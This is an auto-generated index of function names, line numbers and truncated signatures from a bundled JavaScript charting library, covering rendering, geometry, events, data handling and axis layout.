function renderPlainText (line 8737) | function renderPlainText(hostEl, ctx, text, style, rect, prevEl) {
function renderRichText (line 8892) | function renderRichText(hostEl, ctx, text, style, rect, prevEl) {
function drawRichText (line 8908) | function drawRichText(hostEl, ctx, contentBlock, style, rect) {
function applyTextRotation (line 8984) | function applyTextRotation(ctx, style, rect, x, y) {
function placeToken (line 9004) | function placeToken(hostEl, ctx, token, style, lineHeight, lineTop, x, t...
function needDrawBackground (line 9067) | function needDrawBackground(style) {
function drawBackground (line 9076) | function drawBackground(hostEl, ctx, style, x, y, width, height) {
function onBgImageLoaded (line 9141) | function onBgImageLoaded(image, textBackgroundColor) {
function getBoxPosition (line 9147) | function getBoxPosition(out, hostEl, style, rect) {
function setCtx (line 9191) | function setCtx(ctx, prop, value) {
function getStroke (line 9201) | function getStroke(stroke, lineWidth) {
function getFill (line 9210) | function getFill(fill) {
function parsePercent (line 9219) | function parsePercent(value, maxValue) {
function getTextXForPadding (line 9229) | function getTextXForPadding(x, textAlign, textPadding) {
function needDrawText (line 9242) | function needDrawText(text, style) {
function Displayable (line 9323) | function Displayable(opts) {
function ZImage (line 9602) | function ZImage(opts) {
function parseInt10 (line 9709) | function parseInt10(val) {
function isLayerValid (line 9713) | function isLayerValid(layer) {
function isDisplayableCulled (line 9733) | function isDisplayableCulled(el, width, height) {
function isClipPathChanged (line 9743) | function isClipPathChanged(clipPaths, prevClipPaths) {
function doClip (line 9759) | function doClip(clipPaths, ctx) {
function createRoot (line 9772) | function createRoot(width, height) {
function updatePrevLayer (line 10386) | function updatePrevLayer(idx) {
function step (line 10914) | function step() {
function eventNameFix (line 11043) | function eventNameFix(name) {
function isPointerFromTouch (line 11047) | function isPointerFromTouch(event) {
function setTouchTimer (line 11078) | function setTouchTimer(scope) {
function markTouch (line 11092) | function markTouch(event) {
function normalizeGlobalEvent (line 11105) | function normalizeGlobalEvent(instance, event) {
function isLocalEl (line 11114) | function isLocalEl(instance, el) {
function FakeGlobalEvent (line 11134) | function FakeGlobalEvent(instance, event) {
function mountLocalDOMEventListeners (line 11359) | function mountLocalDOMEventListeners(instance, scope) {
function mountGlobalDOMEventListeners (line 11425) | function mountGlobalDOMEventListeners(instance, scope) {
function mountSingleDOMEventListener (line 11458) | function mountSingleDOMEventListener(scope, nativeEventName, listener, o...
function unmountDOMEventListeners (line 11464) | function unmountDOMEventListeners(scope) {
function togglePointerCapture (line 11484) | function togglePointerCapture(instance, isPointerCapturing) {
function DOMHandlerScope (line 11501) | function DOMHandlerScope(domTarget, domHandlers) {
function HandlerDomProxy (line 11518) | function HandlerDomProxy(dom, painterRoot) {
function init$1 (line 11591) | function init$1(dom, opts) {
function dispose$1 (line 11601) | function dispose$1(zr) {
function getInstance (line 11622) | function getInstance(id) {
function registerPainter (line 11626) | function registerPainter(name, Ctor) {
function delInstance (line 11630) | function delInstance(id) {
function normalizeToArray (line 12047) | function normalizeToArray(value) {
function defaultEmphasis (line 12070) | function defaultEmphasis(opt, key, subOpts) {
function getDataItemValue (line 12112) | function getDataItemValue(dataItem) {
function isDataItemOption (line 12122) | function isDataItemOption(dataItem) {
function mappingToExists (line 12138) | function mappingToExists(exists, newCptOptions) {
function makeIdAndName (line 12230) | function makeIdAndName(mapResult) {
function isNameSpecified (line 12307) | function isNameSpecified(componentModel) {
function isIdInner (line 12318) | function isIdInner(cptOption) {
function compressBatches (line 12332) | function compressBatches(batchA, batchB) {
function queryDataIndex (line 12383) | function queryDataIndex(data, payload) {
function makeInner (line 12423) | function makeInner() {
function parseFinder (line 12467) | function parseFinder(ecModel, finder, opt) {
function has (line 12520) | function has(obj, prop) {
function setAttribute (line 12524) | function setAttribute(dom, key, value) {
function getAttribute (line 12530) | function getAttribute(dom, key) {
function getTooltipRenderMode (line 12536) | function getTooltipRenderMode(renderModeOption) {
function groupData (line 12557) | function groupData(array, getKey) {
function parseClassType$1 (line 12597) | function parseClassType$1(componentType) {
function checkClassType (line 12610) | function checkClassType(componentType) {
function enableClassExtend (line 12620) | function enableClassExtend(RootClass, mandatoryMethods) {
function enableClassCheck (line 12665) | function enableClassCheck(Clz) {
function superCall (line 12684) | function superCall(context, methodName) {
function superApply (line 12689) | function superApply(context, methodName, args) {
function enableClassManagement (line 12699) | function enableClassManagement(entity, options) {
function isAroundZero (line 12987) | function isAroundZero(val) {
function isNotAroundZero$1 (line 12990) | function isNotAroundZero$1(val) {
function cubicAt (line 13003) | function cubicAt(p0, p1, p2, p3, t) {
function cubicDerivativeAt (line 13019) | function cubicDerivativeAt(p0, p1, p2, p3, t) {
function cubicRootAt (line 13038) | function cubicRootAt(p0, p1, p2, p3, val, roots) {
function cubicExtrema (line 13130) | function cubicExtrema(p0, p1, p2, p3, extrema) {
function cubicSubdivide (line 13174) | function cubicSubdivide(p0, p1, p2, p3, t, out) {
function cubicProjectPoint (line 13211) | function cubicProjectPoint(
function quadraticAt (line 13289) | function quadraticAt(p0, p1, p2, t) {
function quadraticDerivativeAt (line 13302) | function quadraticDerivativeAt(p0, p1, p2, t) {
function quadraticRootAt (line 13315) | function quadraticRootAt(p0, p1, p2, val, roots) {
function quadraticExtremum (line 13360) | function quadraticExtremum(p0, p1, p2) {
function quadraticSubdivide (line 13380) | function quadraticSubdivide(p0, p1, p2, t, out) {
function quadraticProjectPoint (line 13410) | function quadraticProjectPoint(
function fromPoints (line 13496) | function fromPoints(points, min$$1, max$$1) {
function fromLine (line 13530) | function fromLine(x0, y0, x1, y1, min$$1, max$$1) {
function fromCubic (line 13553) | function fromCubic(
function fromQuadratic (line 13600) | function fromQuadratic(x0, y0, x1, y1, x2, y2, min$$1, max$$1) {
function fromArc (line 13636) | function fromArc(
function containStroke$1 (line 14495) | function containStroke$1(x0, y0, x1, y1, lineWidth, x, y) {
function containStroke$2 (line 14539) | function containStroke$2(x0, y0, x1, y1, x2, y2, x3, y3, lineWidth, x, y) {
function containStroke$3 (line 14573) | function containStroke$3(x0, y0, x1, y1, x2, y2, lineWidth, x, y) {
function normalizeRadian (line 14596) | function normalizeRadian(angle) {
function containStroke$4 (line 14619) | function containStroke$4(
function windingLine (line 14661) | function windingLine(x0, y0, x1, y1, x, y) {
function isAroundEqual (line 14688) | function isAroundEqual(a, b) {
function swapExtrema (line 14696) | function swapExtrema() {
function windingCubic (line 14702) | function windingCubic(x0, y0, x1, y1, x2, y2, x3, y3, x, y) {
function windingQuadratic (line 14765) | function windingQuadratic(x0, y0, x1, y1, x2, y2, x, y) {
function windingArc (line 14814) | function windingArc(
function containPath (line 14878) | function containPath(data, lineWidth, isStroke, x, y) {
function contain (line 15062) | function contain(pathData, x, y) {
function containStroke (line 15066) | function containStroke(pathData, lineWidth, x, y) {
function Path (line 15081) | function Path(opts) {
function processArc (line 15572) | function processArc(x1, y1, x2, y2, fa, fs, rx, ry, psiDeg, cmd, path) {
function createPathProxyFromString (line 15635) | function createPathProxyFromString(data) {
function createPathOptions (line 15904) | function createPathOptions(str, opts) {
function createFromString (line 15935) | function createFromString(str, opts) {
function extendFromString (line 15944) | function extendFromString(str, opts) {
function mergePath$1 (line 15954) | function mergePath$1(pathEls, opts) {
function interpolate (line 16269) | function interpolate(p0, p1, p2, p3, t, t2, t3) {
function buildPath$1 (line 16420) | function buildPath$1(ctx, shape, closePath) {
function subPixelOptimizeLine$1 (line 16526) | function subPixelOptimizeLine$1(outputShape, inputShape, style) {
function subPixelOptimizeRect$1 (line 16569) | function subPixelOptimizeRect$1(outputShape, inputShape, style) {
function subPixelOptimize$1 (line 16609) | function subPixelOptimize$1(position, lineWidth, positiveOrNegative) {
function someVectorAt (line 16764) | function someVectorAt(shape, t, isTangent) {
function IncrementalDisplayble (line 17090) | function IncrementalDisplayble(opts) {
function extendShape (line 17260) | function extendShape(opts) {
function extendPath (line 17267) | function extendPath(pathData, opts) {
function registerShape (line 17282) | function registerShape(name, ShapeClass) {
function getShapeClass (line 17313) | function getShapeClass(name) {
function makePath (line 17326) | function makePath(pathData, opts, rect, layout) {
function makeImage (line 17344) | function makeImage(imageUrl, rect, layout) {
function centerGraphic (line 17373) | function centerGraphic(rect, boundingRect) {
function resizePath (line 17403) | function resizePath(path, rect) {
function subPixelOptimizeLine (line 17428) | function subPixelOptimizeLine(param) {
function subPixelOptimizeRect (line 17446) | function subPixelOptimizeRect(param) {
function hasFillOrStroke (line 17462) | function hasFillOrStroke(fillOrStroke) {
function liftColor (line 17470) | function liftColor(color) {
function cacheElementStl (line 17485) | function cacheElementStl(el) {
function singleEnterEmphasis (line 17513) | function singleEnterEmphasis(el) {
function setDefaultHoverFillStroke (line 17579) | function setDefaultHoverFillStroke(targetStyle, hoverStyle, prop) {
function singleEnterNormal (line 17585) | function singleEnterNormal(el) {
function traverseUpdate (line 17620) | function traverseUpdate(el, updater, commonParam) {
function setElementHoverStyle (line 17653) | function setElementHoverStyle(el, hoverStl) {
function onElementMouseOver (line 17681) | function onElementMouseOver(e) {
function onElementMouseOut (line 17688) | function onElementMouseOut(e) {
function onElementEmphasisEvent (line 17695) | function onElementEmphasisEvent(highlightDigit) {
function onElementNormalEvent (line 17700) | function onElementNormalEvent(highlightDigit) {
function shouldSilent (line 17705) | function shouldSilent(el, e) {
function setHoverStyle (line 17746) | function setHoverStyle(el, hoverStyle) {
function setAsHighDownDispatcher (line 17785) | function setAsHighDownDispatcher(el, asDispatcher) {
function isHighDownDispatcher (line 17812) | function isHighDownDispatcher(el) {
function getHighlightDigit (line 17824) | function getHighlightDigit(highlightKey) {
function setLabelStyle (line 17849) | function setLabelStyle(
function modifyLabelStyle (line 17912) | function modifyLabelStyle(el, normalStyleProps, emphasisStyleProps) {
function setTextStyle (line 17936) | function setTextStyle(
function setText (line 17955) | function setText(textStyle, labelModel, defaultColor) {
function setTextStyleCommon (line 18002) | function setTextStyleCommon(textStyle, textStyleModel, opt, isEmphasis) {
function getRichItemNames (line 18088) | function getRichItemNames(textStyleModel) {
function setTokenTextStyle (line 18106) | function setTokenTextStyle(textStyle, textStyleModel, globalTextStyle, o...
function getAutoColor (line 18171) | function getAutoColor(color, opt) {
function applyDefaultTextStyle (line 18192) | function applyDefaultTextStyle(textStyle) {
function rollbackDefaultTextStyle (line 18248) | function rollbackDefaultTextStyle(style) {
function getFont (line 18259) | function getFont(opt, ecModel) {
function animateOrSetProps (line 18270) | function animateOrSetProps(isUpdate, el, props, animatableModel, dataInd...
function updateProps (line 18330) | function updateProps(el, props, animatableModel, dataIndex, cb) {
function initProps (line 18348) | function initProps(el, props, animatableModel, dataIndex, cb) {
function getTransform (line 18359) | function getTransform(target, ancestor) {
function applyTransform$1 (line 18379) | function applyTransform$1(target, transform, invert$$1) {
function transformDirection (line 18396) | function transformDirection(direction, transform, invert$$1) {
function groupTransition (line 18420) | function groupTransition(g1, g2, animatableModel, cb) {
function clipPointsByRect (line 18468) | function clipPointsByRect(points, rect) {
function clipRectByRect (line 18487) | function clipRectByRect(targetRect, rect) {
function createIcon (line 18511) | function createIcon(iconStr, opt, rect) {
function linePolygonIntersect (line 18547) | function linePolygonIntersect(a1x, a1y, a2x, a2y, points) {
function lineLineIntersect (line 18573) | function lineLineIntersect(a1x, a1y, a2x, a2y, b1x, b1y, b2x, b2y) {
function crossProduct2d (line 18608) | function crossProduct2d(x1, y1, x2, y2) {
function nearZero (line 18612) | function nearZero(val) {
function Model (line 18829) | function Model(option, parentModel, ecModel) {
function doGet (line 18977) | function doGet(obj, pathArr, parentModel) {
function getParent (line 18996) | function getParent(model, path) {
function getUID (line 19036) | function getUID(type) {
function enableSubTypeDefaulter (line 19045) | function enableSubTypeDefaulter(entity) {
function enableTopologicalTravel (line 19077) | function enableTopologicalTravel(entity, dependencyGetter) {
function _trim (line 19222) | function _trim(str) {
function linearMap (line 19235) | function linearMap(val, domain, range, clamp) {
function parsePercent$1 (line 19288) | function parsePercent$1(percent, all) {
function round$1 (line 19323) | function round$1(x, precision, returnStr) {
function asc (line 19340) | function asc(arr) {
function getPrecision (line 19351) | function getPrecision(val) {
function getPrecisionSafe (line 19373) | function getPrecisionSafe(val) {
function getPixelPrecision (line 19395) | function getPixelPrecision(dataExtent, pixelExtent) {
function getPercentWithPrecision (line 19416) | function getPercentWithPrecision(valueList, idx, precision) {
function remRadian (line 19475) | function remRadian(radian) {
function isRadianAroundZero (line 19484) | function isRadianAroundZero(val) {
function parseDate (line 19507) | function parseDate(value) {
function quantity (line 19574) | function quantity(val) {
function quantityExponent (line 19585) | function quantityExponent(val) {
function nice (line 19613) | function nice(val, round) {
function quantile (line 19665) | function quantile(ascArr, p) {
function reformIntervals (line 19695) | function reformIntervals(list) {
function isNumeric (line 19745) | function isNumeric(v) {
function addCommas (line 19797) | function addCommas(x) {
function toCamelCase (line 19811) | function toCamelCase(str, upperCaseFirst) {
function encodeHTML (line 19835) | function encodeHTML(source) {
function formatTpl (line 19856) | function formatTpl(tpl, paramsList, encode) {
function formatTplSimple (line 19891) | function formatTplSimple(tpl, param, encode) {
function getTooltipMarker (line 19910) | function getTooltipMarker(opt, extraCssText) {
function pad (line 19943) | function pad(str, len) {
function formatTime (line 19958) | function formatTime(tpl, value, isUTC) {
function capitalFirst (line 20000) | function capitalFirst(str) {
function getTextBoundingRect (line 20019) | function getTextBoundingRect(opt) {
function getTextRect (line 20038) | function getTextRect(
function boxLayout (line 20100) | function boxLayout(orient, group, gap, maxWidth, maxHeight) {
function getAvailableSize (line 20207) | function getAvailableSize(positionInfo, containerRect, margin) {
function getLayoutRect (line 20245) | function getLayoutRect(
function positionElement (line 20380) | function positionElement(el, positionInfo, containerRect, margin, opt) {
function sizeCalculable (line 20430) | function sizeCalculable(option, hvIdx) {
function mergeLayoutParam (line 20460) | function mergeLayoutParam(targetOption, newOption, opt) {
function getLayoutParams (line 20547) | function getLayoutParams(source) {
function copyLayoutParams (line 20556) | function copyLayoutParams(target, source) {
function getDependencies (line 20794) | function getDependencies(componentType) {
function getNearestColorPalette (line 20919) | function getNearestColorPalette(colors, requestColorNum) {
function Source (line 21072) | function Source(fields) {
function detectSourceFormat (line 21176) | function detectSourceFormat(datasetModel) {
function getSource (line 21243) | function getSource(seriesModel) {
function resetSourceDefaulter (line 21251) | function resetSourceDefaulter(ecModel) {
function prepareSource (line 21272) | function prepareSource(seriesModel) {
function completeBySourceData (line 21316) | function completeBySourceData(data, sourceFormat, seriesLayoutBy, source...
function normalizeDimensionsDefine (line 21395) | function normalizeDimensionsDefine(dimensionsDefine) {
function arrayRowsTravelFirst (line 21434) | function arrayRowsTravelFirst(cb, seriesLayoutBy, data, maxLoop) {
function objectRowsCollectDimensions (line 21449) | function objectRowsCollectDimensions(data) {
function makeSeriesEncodeForAxisCoordSys (line 21480) | function makeSeriesEncodeForAxisCoordSys(coordDimensions, seriesModel, s...
function makeSeriesEncodeForNameBased (line 21569) | function makeSeriesEncodeForNameBased(seriesModel, source, dimCount) {
function getDatasetModel (line 21661) | function getDatasetModel(seriesModel) {
function guessOrdinal (line 21683) | function guessOrdinal(source, dimIndex) {
function doGuessOrdinal (line 21696) | function doGuessOrdinal(
function visitComponent (line 21952) | function visitComponent(mainType, dependencies) {
function getQueryCond (line 22187) | function getQueryCond(q) {
function doFilter (line 22206) | function doFilter(res) {
function isNotTargetSeries (line 22409) | function isNotTargetSeries(seriesModel, payload) {
function mergeTheme (line 22423) | function mergeTheme(option, theme) {
function initBase (line 22448) | function initBase(baseOption) {
function getComponentsByTypes (line 22487) | function getComponentsByTypes(componentsMap, types) {
function determineSubType (line 22503) | function determineSubType(mainType, newCptOption, existComponent) {
function createSeriesIndices (line 22518) | function createSeriesIndices(ecModel, seriesModels) {
function filterBySubType (line 22529) | function filterBySubType(components, condition) {
function assertSeriesInitialized (line 22542) | function assertSeriesInitialized(ecModel) {
function ExtensionAPI (line 22580) | function ExtensionAPI(chartInstance) {
function CoordinateSystemManager (line 22607) | function CoordinateSystemManager() {
function OptionManager (line 22733) | function OptionManager(api) {
function parseRawOption (line 22938) | function parseRawOption(rawOption, optionPreprocessorFuncs, isNew) {
function applyMediaQuery (line 23010) | function applyMediaQuery(query, ecWidth, ecHeight) {
function compare (line 23037) | function compare(real, expect, operator) {
function indicesEquals (line 23049) | function indicesEquals(indices1, indices2) {
function mergeOption (line 23075) | function mergeOption(oldOption, newOption) {
function compatEC2ItemStyle (line 23130) | function compatEC2ItemStyle(opt) {
function convertNormalEmphasis (line 23162) | function convertNormalEmphasis(opt, optType, useExtend) {
function removeEC3NormalStatus (line 23184) | function removeEC3NormalStatus(opt) {
function compatTextStyle (line 23196) | function compatTextStyle(opt, propName) {
function compatEC3CommonStyles (line 23210) | function compatEC3CommonStyles(opt) {
function processSeries (line 23218) | function processSeries(seriesOpt) {
function toArr (line 23321) | function toArr(o) {
function toObj (line 23325) | function toObj(o) {
function get (line 23423) | function get(opt, path) {
function set$1 (line 23435) | function set$1(opt, path, val, overwrite) {
function compatLayoutProperties (line 23451) | function compatLayoutProperties(option) {
function calculateStack (line 23579) | function calculateStack(stackInfoList) {
function DefaultDataProvider (line 23672) | function DefaultDataProvider(source, dimSize) {
function countSimply (line 23826) | function countSimply() {
function getItemSimply (line 23829) | function getItemSimply(idx) {
function appendDataSimply (line 23832) | function appendDataSimply(newData) {
function getRawValueSimply (line 23863) | function getRawValueSimply(dataItem, dataIndex, dimIndex, dimName) {
function getDimValueSimply (line 23904) | function getDimValueSimply(dataItem, dimName, dataIndex, dimIndex) {
function converDataValue (line 23914) | function converDataValue(value, dimInfo) {
function retrieveRawValue (line 23957) | function retrieveRawValue(data, dataIndex, dim) {
function retrieveRawAttr (line 23994) | function retrieveRawAttr(data, dataIndex, attr) {
function createTask (line 24178) | function createTask(define) {
function Task (line 24190) | function Task(define) {
function normalizeModBy (line 24245) | function normalizeModBy(val) {
function sequentialNext (line 24344) | function sequentialNext() {
function modNext (line 24348) | function modNext() {
function doProgress (line 24367) | function doProgress(taskIns, progress, start, end, modBy, modDataCount) {
function reset (line 24375) | function reset(taskIns, skip) {
function formatArrayValue (line 24803) | function formatArrayValue(value) {
function formatSingleValue (line 24864) | function formatSingleValue(val) {
function autoSeriesName (line 25031) | function autoSeriesName(seriesModel) {
function getSeriesAutoName (line 25040) | function getSeriesAutoName(seriesModel) {
function dataTaskCount (line 25051) | function dataTaskCount(context) {
function dataTaskReset (line 25055) | function dataTaskReset(context) {
function dataTaskProgress (line 25061) | function dataTaskProgress(param, context) {
function wrapData (line 25069) | function wrapData(data, seriesModel) {
function onDataSelfChange (line 25075) | function onDataSelfChange(seriesModel) {
function getCurrentTask (line 25083) | function getCurrentTask(seriesModel) {
function Chart (line 25232) | function Chart() {
function elSetState (line 25373) | function elSetState(el, state, highlightDigit) {
function toggleHighlight (line 25392) | function toggleHighlight(data, payload, state) {
function renderTaskPlan (line 25421) | function renderTaskPlan(context) {
function renderTaskReset (line 25425) | function renderTaskReset(context) {
function throttle (line 25505) | function throttle(fn, delay, debounce) {
function createOrUpdate (line 25606) | function createOrUpdate(obj, fnAttr, rate, throttleType) {
function clear (line 25640) | function clear(obj, fnAttr) {
function replace (line 25967) | function replace(str, keyValues) {
function getConfig (line 25982) | function getConfig(path) {
function getTitle (line 25997) | function getTitle() {
function getSeriesTypeName (line 26005) | function getSeriesTypeName(type) {
function Scheduler (line 26150) | function Scheduler(ecInstance, api, dataProcessorHandlers, visualHandler...
function performStageTasks (line 26339) | function performStageTasks(scheduler, stageHandlers, ecModel, payload, o...
function createSeriesStageTask (line 26432) | function createSeriesStageTask(scheduler, stageHandler, stageHandlerReco...
function createOverallStageTask (line 26484) | function createOverallStageTask(scheduler, stageHandler, stageHandlerRec...
function overallTaskReset (line 26558) | function overallTaskReset(context) {
function stubReset (line 26564) | function stubReset(context, upstreamContext) {
function stubProgress (line 26568) | function stubProgress() {
function stubOnDirty (line 26573) | function stubOnDirty() {
function seriesTaskPlan (line 26577) | function seriesTaskPlan(context) {
function seriesTaskReset (line 26583) | function seriesTaskReset(context) {
function makeSeriesTaskProgress (line 26599) | function makeSeriesTaskProgress(resetDefineIdx) {
function seriesTaskCount (line 26615) | function seriesTaskCount(context) {
function pipe (line 26619) | function pipe(scheduler, seriesModel, task) {
function detectSeriseType (line 26652) | function detectSeriseType(legacyFunc) {
function mockMethods (line 26678) | function mockMethods(target, Clz) {
function parseXML (line 26982) | function parseXML(svg) {
function SVGParser (line 27000) | function SVGParser() {
function _parseGradientColorStops (line 27373) | function _parseGradientColorStops(xmlNode, gradient) {
function inheritStyle (line 27398) | function inheritStyle(parent, child) {
function parsePoints (line 27407) | function parsePoints(pointsString) {
function parseAttributes (line 27440) | function parseAttributes(xmlNode, el, defs, onlyInlineStyle) {
function getPaint (line 27511) | function getPaint(str, defs) {
function parseTransformAttribute (line 27526) | function parseTransformAttribute(xmlNode, node) {
function parseStyleAttribute (line 27573) | function parseStyleAttribute(xmlNode) {
function makeViewBoxTransform (line 27603) | function makeViewBoxTransform(viewBoxRect, width, height) {
function parseSVG (line 27636) | function parseSVG(xml, opt) {
function createRegisterEventWithLowercaseName (line 27815) | function createRegisterEventWithLowercaseName(method, ignoreDisposed) {
function MessageCenter (line 27831) | function MessageCenter() {
function ECharts (line 27842) | function ECharts(dom, theme$$1, opts) {
function doConvertPixel (line 28379) | function doConvertPixel(methodName, finder, value) {
function prepare (line 28732) | function prepare(ecIns) {
function updateDirectly (line 28750) | function updateDirectly(ecIns, method, payload, mainType, subType) {
function updateStreamModes (line 28834) | function updateStreamModes(ecIns, ecModel) {
function doDispatchAction (line 28952) | function doDispatchAction(payload, silent) {
function flushPendingActions (line 29029) | function flushPendingActions(silent) {
function triggerUpdatedEvent (line 29037) | function triggerUpdatedEvent(silent) {
function bindRenderedEvent (line 29053) | function bindRenderedEvent(zr, ecIns) {
function prepareView (line 29121) | function prepareView(ecIns, type, ecModel, scheduler) {
function clearColorPalette (line 29208) | function clearColorPalette(ecModel) {
function render (line 29215) | function render(ecIns, ecModel, api, payload) {
function renderComponents (line 29233) | function renderComponents(ecIns, ecModel, api, payload, dirtyList) {
function renderSeries (line 29246) | function renderSeries(ecIns, ecModel, api, payload, dirtyMap) {
function performPostUpdateFuncs (line 29278) | function performPostUpdateFuncs(ecModel, api) {
function disposedWarning (line 29429) | function disposedWarning(id) {
function updateHoverLayerStatus (line 29435) | function updateHoverLayerStatus(ecIns, ecModel) {
function updateBlend (line 29465) | function updateBlend(seriesModel, chartView) {
function updateZ (line 29492) | function updateZ(model, view) {
function createExtensionAPI (line 29504) | function createExtensionAPI(ecInstance) {
function EventProcessor (line 29542) | function EventProcessor() {
function check (line 29632) | function check(query, host, prop, propOnHost) {
function enableConnect (line 29698) | function enableConnect(chart) {
function init (line 29750) | function init(dom, theme$$1, opts) {
function connect (line 29804) | function connect(groupId) {
function disConnect (line 29828) | function disConnect(groupId) {
function dispose (line 29841) | function dispose(chart) {
function getInstanceByDom (line 29858) | function getInstanceByDom(dom) {
function getInstanceById (line 29866) | function getInstanceById(key) {
function registerTheme (line 29873) | function registerTheme(name, theme$$1) {
function registerPreprocessor (line 29881) | function registerPreprocessor(preprocessorFunc) {
function registerProcessor (line 29889) | function registerProcessor(priority, processor) {
function registerPostUpdate (line 29897) | function registerPostUpdate(postUpdateFunc) {
function registerAction (line 29917) | function registerAction(actionInfo, eventName, action) {
function registerCoordinateSystem (line 29945) | function registerCoordinateSystem(type, CoordinateSystem$$1) {
function getCoordinateSystemDimensions (line 29954) | function getCoordinateSystemDimensions(type) {
function registerLayout (line 29971) | function registerLayout(priority, layoutTask) {
function registerVisual (line 29979) | function registerVisual(priority, visualTask) {
function normalizeRegister (line 29986) | function normalizeRegister(targetList, priority, fn, defaultPriority, vi...
function registerLoading (line 30014) | function registerLoading(name, loadingFx) {
function extendComponentModel (line 30022) | function extendComponentModel(opts/*, superClass*/) {
function extendComponentView (line 30035) | function extendComponentView(opts/*, superClass*/) {
function extendSeriesModel (line 30048) | function extendSeriesModel(opts/*, superClass*/) {
function extendChartView (line 30062) | function extendChartView(opts/*, superClass*/) {
function setCanvasCreator (line 30088) | function setCanvasCreator(creator) {
function registerMap (line 30118) | function registerMap(mapName, geoJson, specialAreas) {
function getMap (line 30126) | function getMap(mapName) {
function defaultKeyGetter (line 30182) | function defaultKeyGetter(item) {
function DataDiffer (line 30193) | function DataDiffer(oldArr, newArr, oldKeyGetter, newKeyGetter, context) {
function initIndexMap (line 30288) | function initIndexMap(arr, map, keyArr, keyGetterName, dataDiffer) {
function summarizeDimensions (line 30329) | function summarizeDimensions(data) {
function getOrCreateEncodeArr (line 30422) | function getOrCreateEncodeArr(encode, dim) {
function getDimensionTypeByAxis (line 30429) | function getDimensionTypeByAxis(axisType) {
function mayLabelDimType (line 30437) | function mayLabelDimType(dimType) {
function DataDimensionInfo (line 30479) | function DataDimensionInfo(opt) {
function getIndicesCtor (line 30640) | function getIndicesCtor(list) {
function cloneChunk (line 30645) | function cloneChunk(originalChunk) {
function transferProperties (line 30660) | function transferProperties(target, source) {
function prepareChunks (line 31261) | function prepareChunks(storage, dimInfo, chunkSize, chunkCount, end) {
function prepareInvertedIndex (line 31282) | function prepareInvertedIndex(list) {
function getRawValueFromStore (line 31306) | function getRawValueFromStore(list, dimIndex, rawIndex) {
function getRawIndexWithoutIndices (line 31780) | function getRawIndexWithoutIndices(idx) {
function getRawIndexWithIndices (line 31784) | function getRawIndexWithIndices(idx) {
function getId (line 31831) | function getId(list, rawIndex) {
function normalizeDimensions (line 31843) | function normalizeDimensions(dimensions) {
function validateDimensions (line 31850) | function validateDimensions(list, dims) {
function cloneListForMapAndSample (line 32162) | function cloneListForMapAndSample(original, excludeDimensions) {
function cloneDimStore (line 32194) | function cloneDimStore(originalDimStore) {
function getInitialExtent (line 32202) | function getInitialExtent() {
function completeDimensions (line 32679) | function completeDimensions(sysDims, source, opt) {
function getDimCount (line 32878) | function getDimCount(source, sysDims, dimsDef, optDimCount) {
function genName (line 32894) | function genName(name, map$$1, fromZero) {
function CoordSysInfo (line 33001) | function CoordSysInfo(coordSysName) {
function getCoordSysInfoBySeries (line 33027) | function getCoordSysInfoBySeries(seriesModel) {
function isCategory (line 33144) | function isCategory(axisModel) {
function enableDataStack (line 33187) | function enableDataStack(seriesModel, dimensionInfoList, opt) {
function isDimensionStacked (line 33285) | function isDimensionStacked(data, stackedDim /*, stackedByDim*/) {
function getStackedDimension (line 33303) | function getStackedDimension(data, targetDim) {
function createListFromArray (line 33335) | function createListFromArray(source, seriesModel, opt) {
function isNeedCompleteOrdinalData (line 33419) | function isNeedCompleteOrdinalData(source) {
function firstDataNotNull (line 33427) | function firstDataNotNull(data) {
function Scale (line 33462) | function Scale(setting) {
function OrdinalMeta (line 33626) | function OrdinalMeta(opt) {
function getOrCreateMap (line 33729) | function getOrCreateMap(ordinalMeta) {
function getName (line 33735) | function getName(obj) {
function intervalScaleNiceTicks (line 33907) | function intervalScaleNiceTicks(extent, splitNumber, minInterval, maxInt...
function getIntervalPrecision (line 33935) | function getIntervalPrecision(interval) {
function clamp (line 33940) | function clamp(niceTickExtent, idx, extent) {
function fixExtent (line 33945) | function fixExtent(niceTickExtent, extent) {
function getSeriesStackId (line 34267) | function getSeriesStackId(seriesModel) {
function getAxisKey (line 34271) | function getAxisKey(axis) {
function getLayoutOnAxis (line 34286) | function getLayoutOnAxis(opt) {
function prepareLayoutBarSeries (line 34315) | function prepareLayoutBarSeries(seriesType, ecModel) {
function getValueAxesMinGaps (line 34335) | function getValueAxesMinGaps(barSeries) {
function makeColumnLayout (line 34394) | function makeColumnLayout(barSeries) {
function doCalBarWidthAndOffset (line 34451) | function doCalBarWidthAndOffset(seriesInfoList) {
function retrieveColumnLayout (line 34602) | function retrieveColumnLayout(barWidthAndOffset, axis, seriesModel) {
function layout (line 34616) | function layout(seriesType, ecModel) {
function progress (line 34750) | function progress(params, data) {
function isOnCartesian (line 34787) | function isOnCartesian(seriesModel) {
function isInLargeMode (line 34791) | function isInLargeMode(seriesModel) {
function getValueAxisStart (line 34796) | function getValueAxisStart(baseAxis, valueAxis, stacked) {
function fixRoundingError (line 35227) | function fixRoundingError(val, originalVal) {
function getScaleExtent (line 35254) | function getScaleExtent(scale, model) {
function adjustScaleForOverflow (line 35388) | function adjustScaleForOverflow(min, max, model, barWidthAndOffset) {
function niceScaleExtent (line 35423) | function niceScaleExtent(scale, model) {
function createScaleByModel (line 35461) | function createScaleByModel(model, axisType) {
function ifAxisCrossZero (line 35485) | function ifAxisCrossZero(axis) {
function makeLabelFormatter (line 35500) | function makeLabelFormatter(axis) {
function getAxisRawValue (line 35537) | function getAxisRawValue(axis, value) {
function estimateLabelUnionRect (line 35548) | function estimateLabelUnionRect(axis) {
function rotateTextRect (line 35592) | function rotateTextRect(textRect, rotate) {
function getOptionCategoryInterval (line 35608) | function getOptionCategoryInterval(model) {
function shouldShowAllLabels (line 35619) | function shouldShowAllLabels(axis) {
function symbolPathSetColor (line 36014) | function symbolPathSetColor(color, innerColor) {
function createSymbol (line 36045) | function createSymbol(symbolType, x, y, w, h, color, keepAspect) {
function createList (line 36115) | function createList(seriesModel) {
function createScale (line 36130) | function createScale(dataExtent, option) {
function mixinAxisModelCommonMethods (line 36156) | function mixinAxisModelCommonMethods(Model$$1) {
function isAroundEqual$1 (line 36173) | function isAroundEqual$1(a, b) {
function contain$1 (line 36177) | function contain$1(points, x, y) {
function Region (line 36228) | function Region(name, geometries, cp) {
function decode (line 36400) | function decode(json) {
function decodePolygon (line 36444) | function decodePolygon(coordinate, encodeOffsets, encodeScale) {
function createAxisLabels (line 36552) | function createAxisLabels(axis) {
function createAxisTicks (line 36567) | function createAxisTicks(axis, tickModel) {
function makeCategoryLabels (line 36574) | function makeCategoryLabels(axis) {
